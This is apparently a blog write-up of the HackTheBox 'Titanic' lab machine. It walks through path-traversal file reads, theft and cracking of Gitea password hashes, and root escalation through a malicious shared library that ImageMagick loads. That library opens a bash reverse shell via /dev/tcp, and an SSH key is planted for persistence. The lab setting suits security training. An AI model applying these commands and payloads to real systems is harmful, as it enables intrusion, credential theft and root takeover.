Hackthebox-Season7-Titanic简记[Easy]

简记

ip重定向到 http://titanic.htb,先添加hosts

收集子域名

wfuzz -c -u http://titanic.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host:FUZZ.titanic.htb' --hl 9 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://titanic.htb/ Total requests: 19966 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000019: 200 275 L 1278 W 13870 Ch "dev"

将dev.titanic.htb也加到hosts

主站是一个预约服务，只有一个功能点，预约服务（右上角点击Book New） dev子域是一个gitea代码托管平台，有两个代码库 developer/docker-config developer/flask-app

先测试主站的功能点 使用whatweb查看，显然是一个python站点

$ whatweb http://titanic.htb/ http://titanic.htb/ [200 OK] Bootstrap[4.5.2], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/3.0.3 Python/3.10.12], IP[10.129.194.71], JQuery, Python[3.10.12], Script, Title[Titanic - Book Your Ship Trip], Werkzeug[3.0.3]

（就是dev子域的那个flask-app）第一次做的时候没注意到，就没审计源码

点击Book New，填写信息，会下载一个json文件。 存在文件下载，我们就可以测试一下是否存在任意文件下载

burp抓包,

POST /book HTTP/1.1 Host: titanic.htb Content-Length: 75 Cache-Control: max-age=0 Origin: http://titanic.htb Content-Type: application/x- -form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://titanic.htb/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close name=aaa&email=aaa%40123 &phone=17371996889&date=2222-02-02&cabin=Deluxe

(数据随便填)，放包

HTTP/1.1 302 FOUND Date: Wed, 19 Feb 2025 08:46:42 GMT Server: Werkzeug/3.0.3 Python/3.10.12 Content-Type: text/html; charset=utf-8 Content-Length: 303 Location: /download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json Connection: close <!doctype html> <html lang=en> <title>Redirecting...</title> <h1>Redirecting...</h1> <p>You should be redirected automatically to the target URL: <a href="/download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json">/download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json</a>. If not, click the link.

可以看到302重定向到/download?ticket=xxxxx 好的，测试任意文件下载，linux机器，选择/etc/passwd

$ curl -s http://titanic.htb/download?ticket=/etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash developer:x:1000:1000:developer:/home/developer:/bin/bash

两个用户，web用户要么是developer，要么是 -data 尝试读取developer目录下的flag （猜测、尝试）

$ curl -s http://titanic.htb/download?ticket=/home/developer/user.txt 21ce83fbxxxxxxxxxxxxxxxxxxxx

确实可以读取到user flag

子域的Gitea版本号为1.22.1，没找到公开的漏洞。继续尝试在任意文件下载这个漏洞上撕开口子，扩大危害。

关注代码托管平台的代码，可能存放的是内网的一些服务 查看提交历史，没有用信息。 developer/docker-config记录了两个服务的Dockerfile文件

version: '3' services: gitea: image: gitea/gitea container_name: gitea ports: - "127.0.0.1:3000:3000" - "127.0.0.1:2222:22" # Optional for SSH access volumes: - /home/developer/gitea/data:/data # Replace with your path environment: - USER_UID=1000 - USER_GID=1000 restart: always

这个Dockerfile是 Gitea服务的 值的关注的的一点 volumes 挂载的位置： /home/developer/gitea/data:/data, 将容器内的数据挂在到物理机的/home/developer/gitea/data目录下

通过浏览器搜索“gitea data目录"

data/ - 数据目录（APP_DATA_PATH），如果使用文件会话，则不包括会话。该目录包括 attachments、avatars、lfs、indexers、如果使用 SQLite 则包括 SQLite 文件。

version: '3.8' services: mysql: image: mysql:8.0 container_name: mysql ports: - "127.0.0.1:3306:3306" environment: MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!' MYSQL_DATABASE: tickets MYSQL_USER: sql_svc MYSQL_PASSWORD: sql_password restart: always

这个是msql的dockerfile，有一个密码MySQLP@$$w0rd!,先记录一下。

查看官方文档配置说明 | Gitea Documentation，Linux的默认配置文件路径为/etc/gitea/conf/app.ini。 结合

volumes: - /home/developer/gitea/data:/data

尝试访问

$ curl -s http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini APP_NAME = Gitea: Git with a cup of tea RUN_MODE = prod RUN_USER = git WORK_PATH = /data/gitea [repository] ROOT = /data/git/repositories [repository.local] LOCAL_COPY_PATH = /data/gitea/tmp/local-repo [repository.upload] TEMP_PATH = /data/gitea/uploads [server] APP_DATA_PATH = /data/gitea DOMAIN = gitea.titanic.htb SSH_DOMAIN = gitea.titanic.htb HTTP_PORT = 3000 ROOT_URL = http://gitea.titanic.htb/ DISABLE_SSH = false SSH_PORT = 22 SSH_LISTEN_PORT = 22 LFS_START_SERVER = true LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4 OFFLINE_MODE = true [database] PATH = /data/gitea/gitea.db DB_TYPE = sqlite3 HOST = localhost:3306 NAME = gitea USER = root PASSWD = LOG_SQL = false SCHEMA = SSL_MODE = disable [indexer] ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve [session] PROVIDER_CONFIG = /data/gitea/sessions PROVIDER = file [picture] AVATAR_UPLOAD_PATH = /data/gitea/avatars REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars [attachment] PATH = /data/gitea/attachments [log] MODE = console LEVEL = info ROOT_PATH = /data/gitea/log [security] INSTALL_LOCK = true SECRET_KEY = REVERSE_PROXY_LIMIT = 1 REVERSE_PROXY_TRUSTED_PROXIES = * INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8 PASSWORD_HASH_ALGO = pbkdf2 [service] DISABLE_REGISTRATION = false REQUIRE_SIGNIN_VIEW = false REGISTER_EMAIL_CONFIRM = false ENABLE_NOTIFY_MAIL = false ALLOW_ONLY_EXTERNAL_REGISTRATION = false ENABLE_CAPTCHA = false DEFAULT_KEEP_EMAIL_PRIVATE = false DEFAULT_ALLOW_CREATE_ORGANIZATION = true DEFAULT_ENABLE_TIMETRACKING = true NO_REPLY_ADDRESS = noreply.localhost [lfs] PATH = /data/git/lfs [mailer] ENABLED = false [openid] ENABLE_OPENID_SIGNIN = true ENABLE_OPENID_SIGNUP = true [cron.update_checker] ENABLED = false [repository.pull-request] DEFAULT_MERGE_STYLE = merge [repository.signing] DEFAULT_TRUST_MODEL = committer [oauth2] JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g

在配置中有sqlite数据库的（PATH = /data/gitea/gitea.db）路径，尝试下载

$ curl http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db --output gitea.db % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 2036k 100 2036k 0 0 1878k 0 0:00:01 0:00:01 --:--:-- 1879k

成功下载。查看数据库 可以使用gui工具查看，如sqllitebrowser 或者使用命令行工具

$ sqlite3 gitea.db sqlite> .tables <SNIP> user <SNIP>

重点关注user表，先查看一下表结构，用户名、密码、密码哈希、加密算法、盐

sqlite> .schema user sqlite> select name,passwd,passwd_hash_algo,salt from user; administrator|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|2d149e5fbd1b20cf31db3e3c6a28fc9b developer|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|8bf3e3452b78544f8bee9400d6936d34

搜一下”gitea password created“，在github上有很多现成的项目可以使用

dvdknaap/gitea-crack-passwords: Crack GITEA passwords 通过上面/etc/passwd的内容，我们知道在机器上有developer用户，爆破developer对应的密码哈希 $ python3 1.py -s 8bf3e3452b78544f8bee9400d6936d34 -t e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 -w /usr/share/wordlists/rockyou.txt <SNIP> <SNIP> Found password: 25282528 F4dee3/gitea2hashcat: Script created in Bash to cracked the password of Gitea and export in Hashcat format. 将密码转化为hashcat格式 $ ./gitea2hashcat.sh [+] Usage: ./gitea2hashcat.sh -d) Provide the database file (e.g., gitea.db) -o) Specify the output file -h) Display this help panel $ ./gitea2hashcat.sh -d gitea.db -o gitea.hash gitea.hash内容如下 administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY= developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

使用hashcat爆破

$ hashcat --username gitea.hashes /usr/share/wordlists/rockyou.txt

然后及时ssh登陆，密码是25282528

ssh developer@titanic.htb => 登录成功~

接着就是提权· sudo -l 起手，必是小丑

在/opt/scripts/目录下发现一个shell文件

cd /opt/app/static/assets/images truncate -s 0 metadata.log find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

问AI：使用 ImageMagick 的 identify 命令提取每个 JPG 文件的元数据信息，最后将这些元数据信息追加写入 metadata.log 文件中 ImageMagick版本信息

developer@titanic:/opt/scripts$ magick --version Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.5) Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib Compiler: gcc (9.4)

搜索ImageMagick 7.1.1-35 github poc,第一条就是 poc 在当前工作目录中创建共享库：（/opt/app/static/assets/images/ ）

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init(){ system("id"); exit(0); } EOF

修改system执行的命令，执行一个cat /root/root.txt > /tmp/root.txt 成功拿到flag

弹个shell

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init(){ system("bash -c '/bin/bash -i >& /dev/tcp/ip/1234 0>&1'"); exit(0); } EOF

监听nc -lvnp 1234

└─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [Your-IP] from (UNKNOWN) [Machine] 38172 bash: cannot set terminal process group (6262): Inappropriate ioctl for device bash: no job control in this shell root@titanic:/opt/app/static/assets/images# id id uid=0(root) gid=0(root) groups=0(root)

---

简单的权限维持，写公钥

echo 你的公钥 >> ~/.ssh/authorized_keys

然后就可以ssh连接了(不需要密码了)

ssh root@titanic.htb root@titanic:~# id uid=0(root) gid=0(root) groups=0(root) Beyond Root

定时任务

root@titanic:~# crontab -l * * * * * /opt/scripts/identify_images.sh && /root/cleanup.sh */10 * * * * /root/revert.sh

在获得普通用户时，就执行ifconfig，发现有docker网卡 现在有root权限了

root@titanic:~# docker ps docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 069e7799bf90 gitea/gitea "/usr/bin/entrypoint鈥? 6 months ago Up 3 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:2222->22/tcp gitea

然后就可以进入到容器里面看看了（docker exec -it 069 bash)

Blog原贴地址